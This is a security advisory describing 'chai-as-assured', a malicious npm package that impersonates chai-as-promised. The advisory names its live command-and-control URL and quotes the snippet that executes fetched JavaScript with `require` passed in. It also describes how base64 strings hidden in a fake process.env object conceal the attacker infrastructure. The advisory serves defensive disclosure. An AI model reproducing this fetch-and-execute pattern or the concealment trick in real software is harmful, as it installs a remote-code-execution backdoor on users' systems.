MAL-2026-6532

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd28efd7a3d07f87ec22556cc25a8c07117fa4cdd237c6cb1db750c976a11836) chai-as-assured impersonates the popular chai-as-promised package (matching README, author, and API surface). When the exported plugin function is invoked under normal usage, an async IIFE in the plugin body base64-decodes a hardcoded URL (https://amethyst-lorrin-26.tiiny.site/index.json), performs an axios.get against that anonymous third-party host with a disguised header, and executes the response's `cookie` field as JavaScript via `new Function.constructor('require', response)(require)`. The fetched payload runs with full Node module privileges (filesystem, network, child_process, etc.) because `require` is passed in. The C2 URL, header name (`x-secret-key`), and header value are concealed as base64 strings inside a fake local `process.env` object (DEV_API_KEY / DEV_SECRET_KEY / DEV_SECRET_VALUE) that shadows Node's global to evade casual source review. The combination of name-confusion against a top-100 chai ecosystem package, deliberate obfuscation of attacker infrastructure, an unpinned anonymous tiiny.site host, and dynamic execution of the fetched response with `require` is an unambiguous remote-code-execution dropper targeting any project that installs and loads this plugin.